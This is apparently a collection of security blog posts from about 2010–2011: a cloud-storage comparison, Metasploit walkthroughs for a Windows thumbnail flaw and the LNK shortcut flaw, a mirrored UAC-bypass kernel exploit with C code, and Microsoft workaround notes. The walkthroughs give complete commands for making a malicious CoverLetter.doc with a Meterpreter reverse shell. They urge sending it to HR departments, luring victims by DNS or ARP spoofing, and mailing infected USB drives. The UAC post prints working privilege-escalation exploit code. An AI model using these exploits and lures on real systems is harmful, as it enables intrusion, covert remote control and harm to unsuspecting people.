Battle of the cloud storage providers

With the recent show and tell of Google's GDrive cloud storage solution, it's now painfully obvious that the other cloud storage providers in that arena are scrambling for fear of losing business. As we all know, Google has a track record of coming out with solutions that rival the competitors' and usually ends up the victor. This market has become very popular over the last few years, and statistically it has been proven that users who start off as free users will eventually become paying customers, so the key is to get as many free users as possible.

For the last year or so the words "free cloud storage" were almost synonymous with "Dropbox"; even on the mobile platform their application was widely accepted. Now, with Google finally in the arena, it's going to be interesting to see how the others will start to change their business model. I have recently received some form of communication from the following providers (SkyDrive, Box, Dropbox, Ubuntu One) and wanted to give a brief summary of them and see how they might stack up to GDrive.

Let's start with GDrive: they are offering 5 GB free for new users, have a mobile application (Android devices) and the GDocsDrive desktop client, allow all of the average features (upload, share, collaborate), and as of now appear to have a 10 GB file-size upload limitation. The other interesting thing is that upgrading to 25 GB will only cost you $2.50 a month, or 100 GB for just $4.99/mo. The one reason I believe they might capture a large piece of market share is simply their name and the fact that they have a solid infrastructure and should be able to handle larger traffic than the average provider in this sphere.

Next is Dropbox, which is a free service that lets you bring all your photos, docs and videos anywhere. This means that any file you save to your Dropbox will automatically be saved to all your computers, phones and even the Dropbox website. They start off with 2 GB free plus an additional 500 MB per referral; the paid model starts with 50 GB for $10/mo, and there is a file-size upload limit of 2 GB, though if you upload files via the website you have a 300 MB cap.

SkyDrive, which has been trying to gain popularity for a while and at one point offered 25 GB of free storage, recently restructured and is only offering 7 GB free for all new users; you had the option to keep your 25 GB if you were an old user, but you had to log in and claim it before April 22, which has already passed. If you require more space and you love SkyDrive you can get 20 GB for $10/yr or 100 GB for $50/yr. As of now SkyDrive offers the most free space and the most value for your money per unit of space annually.

Box is another competitor, who recently tried to gain new users by offering mobile users 50 GB free for life if they signed up from their mobile device. If you don't use this option you can always get 25 GB for $10/mo or 50 GB for $20/mo. They have a few downfalls: they have a 200 MB file upload cap, and of course they only offer a desktop client to business/enterprise users.

Last on my list is Ubuntu One, which currently offers the standard 5 GB for free users, and you can get an additional 20 GB for $3/mo or $30/yr. The good thing is that you are getting good value for your money; however, I don't think they do a good job marketing this product, and as such I believe they might fade into the background amidst all the other big names out there.

For a great overview of some of the services mentioned above you can take a glance at this comparison image I found over at PCWorld.

What services are you using?


New Year, New MS Zero Day

With the new year usually comes hope for new changes; however, it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Today's blog posting is based on the new Vulnerability in Graphics Rendering Engine. The guys over at have created a working exploit module for this that I was testing, and it seems to be working as stated.

According to the note in the module: This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the "Thumbnails" view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious ones). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.
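As an added defensive check (example code, not part of this post or of the Metasploit module), the parser below reads a BITMAPINFOHEADER of the kind embedded as a thumbnail and flags the sign-bit biClrUsed the module note describes, plus a palette-size sanity check that catches the same class of bad header. The verdict names, the helper functions and the constructed 16x16 header are assumptions of the example, not anything from the vulnerable code.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* BITMAPINFOHEADER is 40 bytes, little-endian: biSize(4) biWidth(4) biHeight(4)
 * biPlanes(2) biBitCount(2) biCompression(4) biSizeImage(4) biXPelsPerMeter(4)
 * biYPelsPerMeter(4) biClrUsed(4) biClrImportant(4). */
#define BIH_SIZE          40
#define BIH_OFF_BITCOUNT  14
#define BIH_OFF_CLRUSED   32

enum thumb_verdict {
    THUMB_OK = 0,
    THUMB_TRUNCATED,         /* fewer than 40 header bytes available */
    THUMB_BAD_HEADER_SIZE,   /* biSize smaller than a BITMAPINFOHEADER */
    THUMB_NEGATIVE_CLRUSED,  /* biClrUsed negative when read as signed: the trigger named above */
    THUMB_OVERSIZED_PALETTE  /* more palette entries than 2^biBitCount allows */
};

static uint32_t rd_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint16_t rd_le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr_le32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void wr_le16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* Inspect a candidate thumbnail header without trusting any field in it. */
enum thumb_verdict check_thumbnail_header(const uint8_t *buf, size_t len) {
    if (len < BIH_SIZE)
        return THUMB_TRUNCATED;
    if (rd_le32(buf) < BIH_SIZE)        /* V4/V5 headers are larger; only smaller is invalid */
        return THUMB_BAD_HEADER_SIZE;

    uint32_t clr_used  = rd_le32(buf + BIH_OFF_CLRUSED);
    uint16_t bit_count = rd_le16(buf + BIH_OFF_BITCOUNT);

    /* biClrUsed is a DWORD on disk, but the module note says a negative value
     * drives the overflow, so any value with the sign bit set is rejected outright. */
    if (clr_used & 0x80000000u)
        return THUMB_NEGATIVE_CLRUSED;

    /* Palette images cannot list more colors than 2^bpp; for true-color images
     * biClrUsed is only a hint and 0 is the normal value. */
    if (bit_count >= 1 && bit_count <= 8 && clr_used > (1u << bit_count))
        return THUMB_OVERSIZED_PALETTE;
    return THUMB_OK;
}

/* Build a constructed 16x16 header for testing (not a real thumbnail from any file),
 * then check the first `len` bytes of it. */
enum thumb_verdict check_constructed(uint16_t bit_count, uint32_t clr_used, size_t len) {
    uint8_t h[BIH_SIZE];
    memset(h, 0, sizeof h);
    wr_le32(h + 0,  BIH_SIZE);   /* biSize */
    wr_le32(h + 4,  16);         /* biWidth */
    wr_le32(h + 8,  16);         /* biHeight */
    wr_le16(h + 12, 1);          /* biPlanes */
    wr_le16(h + BIH_OFF_BITCOUNT, bit_count);
    wr_le32(h + BIH_OFF_CLRUSED,  clr_used);
    return check_thumbnail_header(h, len < sizeof h ? len : sizeof h);
}

int main(void) {
    static const char *names[] = { "ok", "truncated", "bad header size",
                                   "negative biClrUsed", "oversized palette" };
    printf("8bpp, 256 colors   : %s\n", names[check_constructed(8, 256, BIH_SIZE)]);
    printf("8bpp, biClrUsed=-1 : %s\n", names[check_constructed(8, 0xFFFFFFFFu, BIH_SIZE)]);
    printf("4bpp, 1000 colors  : %s\n", names[check_constructed(4, 1000, BIH_SIZE)]);
    printf("10-byte fragment   : %s\n", names[check_constructed(8, 256, 10)]);
    return 0;
}
```

Running the same check over thumbnails extracted from inbound Office attachments is one way to spot this class of file before a user ever switches a folder to the Thumbnails view.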


Test Lab Setup:

  • I used VMware Workstation with two hosts (XP and BT4)
  • I tested this against a Windows XP SP3 host
  • I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
  • Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

  • Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host; once that was up I issued the svn up command to ensure I had the latest and greatest.
  • Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
  • Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH /opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your payload: I decided to go with Meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (the host you want the victim to reverse-connect to):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST


msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next, issue the exploit command to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating 'CoverLetter.doc' file ...

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to set up our reverse handler to listen on port 4545 for any incoming connections once our victim views/opens our specially crafted file. We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to connect back home :).

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST


msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now, once our victim views the file in a thumbnail view or opens it, you should see something like this:

[*] Started reverse handler on

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to

[*] Meterpreter session 1 opened ( -> at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the "shell" command, or set up a persistent Meterpreter backdoor as shown by Carlos, or start capturing Windows logons with Smartlocker; basically the sky's the limit. Have fun hacking something.

Reference links:

Bypassing UAC with User Privilege under Windows Vista/7 **Mirrored**

Now, the reason for this post is just to mirror what I think should be public knowledge and not be kept hidden, since it was initially released yesterday. Today when I revisited the original site to download the PoC and do some testing in my lab I noticed it was removed. After looking around online a bit I found a few sites that were mirroring the information and I decided to do the same.

Bypassing UAC with User Privilege under Windows Vista/7

A Design Flaw in Windows Kernel API Leads to Security Breakdown

Download POC code & copy of original posting–>


I would like to present an exploit of an ambiguous parameter in the Windows kernel API that leads to buffer overflows under nearly every version of Microsoft Windows, especially one that can be used as a backdoor to the Windows user privilege system as well as User Access Control.

The starring API would be RtlQueryRegistryValues; it is meant to be used to query multiple registry values by a query table, given the EntryContext field as the output buffer. The problem is that this field can be treated either as a UNICODE_STRING structure or as a ULONG buffer length followed by the actual buffer, and this is determined by the type of the registry key being queried.

Using the code

In this example, I found a registry key which can be manipulated with only user rights; changing its type to REG_BINARY overflows the kernel. When Win32k.sys->NtGdiEnableEudc queries the HKCU\EUDC\[Language]\SystemDefaultEUDCFont registry value, it assumes that the registry value is REG_SZ, so the buffer provided on the stack is a UNICODE_STRING structure, of which the first ULONG value represents the length of the string buffer; but if the value in the registry is of REG_BINARY type, it will be wrongly interpreted as the length of the given buffer, thus overwriting the stack.

Pastebin code –>

Stack trace shows the calling process is as follows:

GDI32.EnableEUDC ->
NtGdiEnableEudc ->
GreEnableEUDC ->
sub_BF81B3B4 ->
sub_BF81BA0B ->
RtlQueryRegistryValues (Overflow occurs)

Given this, we can design the registry value which will precisely overwrite the return address of the calling function on the stack, resulting in an arbitrary buffer being executed in kernel mode. In my PoC the buffer contains a simple kernel PE loader, which will eventually load a driver that will escalate the "cmd.exe" process privilege regardless of UAC.
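To make the ambiguity concrete, here is an added user-mode model (example code, not part of the mirrored PoC) that sizes the write the way the article describes: the type of the value found in the registry, not the caller's reservation, decides how EntryContext is decoded. The UNICODE_STRING and REG_VALUE stand-ins, the simplified copy semantics and the 4 KiB value are assumptions of the model; the typed_query_accepts check is the kind of mitigation later ntddk.h releases expose through the RTL_QUERY_REGISTRY_TYPECHECK flag.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

/* Minimal stand-ins for the Windows types the article names. */
typedef struct {
    uint16_t Length;
    uint16_t MaximumLength;
    wchar_t *Buffer;
} UNICODE_STRING;

enum { REG_SZ = 1, REG_BINARY = 3 };

/* A constructed registry value as the query routine finds it. */
typedef struct {
    uint32_t Type;
    uint32_t DataLength;   /* bytes stored under the value */
} REG_VALUE;

/* Bytes the routine would write into the memory starting at EntryContext (the
 * caller's stack slot), sized by the STORED value's type, not by what the caller
 * reserved. Simplified model (assumption): string data goes to us->Buffer and only
 * Length is updated in the slot; other types are copied right behind a leading
 * ULONG, bounded by that ULONG. */
size_t entry_context_footprint(const REG_VALUE *v, const void *entry_context) {
    if (v->Type == REG_SZ)
        return sizeof(UNICODE_STRING);
    uint32_t claimed;                            /* first ULONG read as "buffer size" */
    memcpy(&claimed, entry_context, sizeof claimed);
    size_t n = v->DataLength < claimed ? v->DataLength : claimed;
    return sizeof(uint32_t) + n;
}

/* The flaw: the caller reserved `reserved` bytes, but the write is sized elsewhere. */
bool query_would_overflow(const REG_VALUE *v, const void *entry_context, size_t reserved) {
    return entry_context_footprint(v, entry_context) > reserved;
}

/* Defensive variant: decode EntryContext only when the stored type is the one the
 * caller expected; reject (and write nothing) otherwise. */
bool typed_query_accepts(uint32_t stored_type, uint32_t expected_type) {
    return stored_type == expected_type;
}

/* Scenario mirroring the article: the caller expects REG_SZ and passes a
 * UNICODE_STRING whose Buffer points at a 256-character array elsewhere.
 * On a little-endian host the slot's first ULONG is Length | MaximumLength << 16,
 * which the REG_BINARY path misreads as a huge buffer size. */
static wchar_t g_font_name[256];
static UNICODE_STRING g_slot = { 0, (uint16_t)sizeof g_font_name, g_font_name };

/* True when a value of `stored_type` holding 4 KiB of data would write past the slot. */
bool scenario_overflows(uint32_t stored_type) {
    REG_VALUE v = { stored_type, 0x1000 };
    return query_would_overflow(&v, &g_slot, sizeof g_slot);
}

int main(void) {
    printf("slot reserved on stack    : %zu bytes\n", sizeof g_slot);
    printf("REG_SZ value overflows    : %s\n", scenario_overflows(REG_SZ) ? "yes" : "no");
    printf("REG_BINARY value overflows: %s\n", scenario_overflows(REG_BINARY) ? "yes" : "no");
    printf("typed query accepts REG_BINARY for a REG_SZ caller: %s\n",
           typed_query_accepts(REG_BINARY, REG_SZ) ? "yes" : "no");
    return 0;
}
```

The model never performs the out-of-bounds write; it only reports how far the write would reach, which is the property a reviewer of any RtlQueryRegistryValues caller wants to reason about.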

Pastebin code –>

The shellcode needs some kernel APIs; we need to get their addresses from the running kernel.

/* code snip */

// Get the running kernel file name
PSYSTEM_MODULE_INFORMATIONS pModInfo = NULL;   // declaration omitted in the original snippet
HMODULE hDll = GetModuleHandle(L"ntdll.dll");
pfnZwQuerySystemInformation fnZwQuerySystemInformation = (pfnZwQuerySystemInformation)GetProcAddress(hDll, "ZwQuerySystemInformation");
ULONG AllocSize = 0;
// First call only reports the required size in AllocSize
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);

pModInfo = (PSYSTEM_MODULE_INFORMATIONS)malloc(AllocSize);
fnZwQuerySystemInformation(SystemModuleInformation, pModInfo, AllocSize, &AllocSize);
// modinfo[0] is the kernel image; map it in user mode without resolving imports
HMODULE hKernel = LoadLibraryExA(pModInfo->modinfo[0].ImageName + pModInfo->modinfo[0].ModuleNameOffset, NULL, DONT_RESOLVE_DLL_REFERENCES);

// Relocation to the running kernel base
DWORD Delta = (DWORD)pModInfo->modinfo[0].Base - (DWORD)hKernel;

// For Vista, there is a Pool address on the stack which is going to be passed to ExFreePool before the function returns,
// so we need a valid pool address to avoid BSOD.
if (vi.dwBuildNumber < 7600)   // vi: OSVERSIONINFO filled in earlier in the PoC
    FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x2C);

PSYSTEM_HANDLE_INFORMATION pHandleInfo = NULL;   // declaration omitted in the original snippet
HANDLE hDummy = CreateSemaphore(NULL, 10, 10, L"Local\\PoC");
fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

pHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(pHandleInfo, AllocSize);
fnZwQuerySystemInformation(SystemHandleInformation, pHandleInfo, AllocSize, &AllocSize);

// Find the kernel object behind our semaphore handle; stepping back over its header
// gives the start of a valid pool allocation
for (DWORD i = 0; i < pHandleInfo->NumberOfHandles; i++)
    if ((HANDLE)pHandleInfo->Handles[i].HandleValue == hDummy)
        *(DWORD*)(RegBuf + 0x4) = (DWORD)(pHandleInfo->Handles[i].Object) - 0x18;
FixDWORD(pMem, sizeof(Data), 0xAAAAAAAA, 0x30);

// Now fill in the API addresses needed
FixDWORD(pMem, sizeof(Data), 0x11111111, (DWORD)GetProcAddress(hKernel, "ExAllocatePoolWithTag") + Delta);
FixDWORD(pMem, sizeof(Data), 0x22222222, (DWORD)GetProcAddress(hKernel, "RtlInitAnsiString") + Delta);
FixDWORD(pMem, sizeof(Data), 0x33333333, (DWORD)GetProcAddress(hKernel, "RtlAnsiStringToUnicodeString") + Delta);
FixDWORD(pMem, sizeof(Data), 0x44444444, (DWORD)GetProcAddress(hKernel, "MmGetSystemRoutineAddress") + Delta);
FixDWORD(pMem, sizeof(Data), 0x55555555, (DWORD)GetProcAddress(hKernel, "RtlFreeUnicodeString") + Delta);
FixDWORD(pMem, sizeof(Data), 0x66666666, (DWORD)GetProcAddress(hKernel, "memcpy") + Delta);
FixDWORD(pMem, sizeof(Data), 0x77777777, (DWORD)GetProcAddress(hKernel, "memset") + Delta);
FixDWORD(pMem, sizeof(Data), 0x88888888, (DWORD)GetProcAddress(hKernel, "KeDelayExecutionThread") + Delta);

// Here we tell the shellcode (PE loader) where the driver buffer is.
FixDWORD(pMem, sizeof(Data), 0x11223344, sizeof(DrvBuf));
FixDWORD(pMem, sizeof(Data), 0x55667788, (DWORD)pDrvMem);

/* end snip */

Pastebin code –>

Finally, we set the registry value and call GDI32.EnableEUDC to fire the exploit.

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);        // Build the per-code-page key name under HKCU
HKEY hKey;
// hKey must be opened on HKEY_CURRENT_USER\<tmpstr> before use (the open call is omitted in this snippet)
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

// Store the crafted buffer as REG_BINARY where the kernel expects REG_SZ
RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

// The GDI32.EnableEUDC call described above goes here; then remove the value again
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

After running this PoC, just type "whoami" in the command prompt to see the escalated user credentials.

Points of Interest

All actions this PoC performs require only user privilege, but result in arbitrary kernel mode code execution due to the ambiguous design of RtlQueryRegistryValues. This design flaw exists in most versions of Windows kernels, yet no patch or documentation is publicly available on this issue.

Additional Information

This PoC may not correctly fix the exploited kernel context and resume execution without BSOD; kernels earlier than 6.1.6000 are not supported. Currently supported kernels are:
Windows Vista/2008 6.1.6000 x32,
Windows Vista/2008 6.1.6001 x32,
Windows 7 6.2.7600 x32,
Windows 7/2008 R2 6.2.7600 x64.
Beyond this scope you may contact me for information on how to tune the code to work correctly on your kernel or on how the shellcode works, etc. Those contents are beyond the scope of this article and of no importance to the exploit, therefore they are not included.




Initial release: 2010.11.24


This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)


Month of Abysssec Undisclosed Bugs

The post below came through the Full Disclosure mailing list today, and I figured that something this interesting merited a re-post.

Month of Abysssec Undisclosed Bugs – Day 1 From: muts
Date: Wed, 01 Sep 2010 15:21:34 +0200

Hi Lists,

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB).

During this month, Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc.

The exploits, papers and PoCs will be featured on the Exploit-Database, averaging one 0day and one binary analysis a day.

Get your hard-hats on, your VMs and debugging tools organized; it's going to be an intensive ride.

Posted today – MOAUB Day 1:


Abysssec and the Exploit Database Team

Since these are going to be mostly 0-days or currently unpatched vulnerabilities, it might be time to update to the latest versions of your various applications. Lastly, if you have not been looking at your various logs and consoles, this week might be a good time to start.

Exploiting MS “LNK” Vulnerability

A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability; this entry basically explains what the issue is and also lists a few basic mitigation techniques.

Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing:
This test was performed using my BT4 VM, which was assigned IP address , and a Win XP SP3 VM using IP address .

Step 1: Load Metasploit and get latest update

On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then loaded msfconsole; once that is loaded, run svn update so you get the latest and greatest.

Fig-1 SVN Update

Step 2: Select your Exploit and Payload

msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

The show options command will show you the various parameters that need to be set in order for the exploit to be functional. In our case it's setting up the listening IP and listening port.

Fig-2  Choosing Exploit and Payload

Step 3: Fill-in required options and run exploit

At this stage you simply fill in the correct IP address and listening port for the machine you are launching the attack from. If this is not correct the victim machine would not know where to connect back to, since I selected reverse_tcp.

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set SRVHOST

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set LHOST

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

Now at this stage you have to get a bit creative; I can suggest a few things you can try:

  • Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
  • Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
  • ARP spoof your host network and find a given target that's using Facebook or one of many social networks and try to send them the link that way.
  • Try a far-out social engineering attack like purchasing several USB drives, injecting them and mailing them to your target with the label "free USB drive".

Once you have your targets in sight just sit back and wait; once an exploitation has been kicked off you will see the below:

Fig-4 Successful Exploit

Verify you have an active session using sessions -l, then connect to that session with sessions -i #; from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XP VM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is really not much the average user, who is not aware of your everyday vulnerability, can do, but we as IT professionals need to be in the loop so that we can take back the information and make them aware. Lastly, the image in figure 6 should be a dead giveaway that something is up with your computer: if you didn't connect to a share but all of a sudden you see one pop up, it's time for a "wipe and reinstall." Have fun until Microsoft patches this one and remember to be responsible. All feedback is welcome.

Microsoft Validates Shortcut Vulnerability

Last Thursday I read a posting over at referencing a potential vulnerability that relates to the way Windows parses shortcuts. Since Microsoft didn't confirm this at the time, it was just another interesting read. Now, one day later, Microsoft did validate this claim, and it's yet another Windows zero-day without a proper workaround.


The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.


Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

Disable the displaying of icons for shortcuts

Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe.

1. Click Start, click Run, type Regedit in the Open box, and then click OK
2. Locate and then click the following registry key:


3. Click the File menu and select Export
4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save

Note This will create a backup of this registry key in the My Documents folder by default

5. Select the value (Default) on the right hand window in the Registry Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter.
6. Restart explorer.exe or restart the computer.

Impact of workaround. Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

Disable the WebClient service

Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet.

To disable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Disabled. If the service is running, click Stop.
4. Click OK and exit the management application.

Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer.

How to undo the workaround.

To re-enable the WebClient Service, follow these steps:

1. Click Start, click Run, type Services.msc and then click OK.
2. Right-click WebClient service and select Properties.
3. Change the Startup type to Automatic. If the service is not running, click Start.
4. Click OK, and exit the management application.

This brings up the same concern I spoke about in this post: now that Microsoft is no longer supporting SP2, we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission-critical application, I think everyone should apply it.


Patch Tuesday & XP SP2 end of life

In the words of Microsoft, Patch Tuesday is defined as "When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often."

Now, just in case you are wondering why I am choosing today of all days to talk about Patch Tuesday: for starters, today is significant because patches and support for XP SP2 officially end today. This might not seem like a big deal for a lot of people, but I know there are several companies that still run legacy software that is not supported by SP3 or above. So in short, any new vulnerabilities that are discovered in the coming months or years will have all those users at their disposal, just waiting to be exploited!

If you think that's bad, what about if a vulnerability was already reported to Microsoft years ago and it was never patched? Then those users could have already been exploited. A reference for this was a statement made by HD Moore on Twitter today: "Almost four years later, Microsoft EOL's Windows XP SP2 without fixing the flaw I reported in 2006." HDM is the Chief Architect of the Metasploit project, which was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but what if this exploit and many more like it were in the wrong hands? The sky's the limit.

So for anyone still using XP SP2, it's time to apply the patches below, and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

  • MS10-042 (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
  • MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
  • MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
  • MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.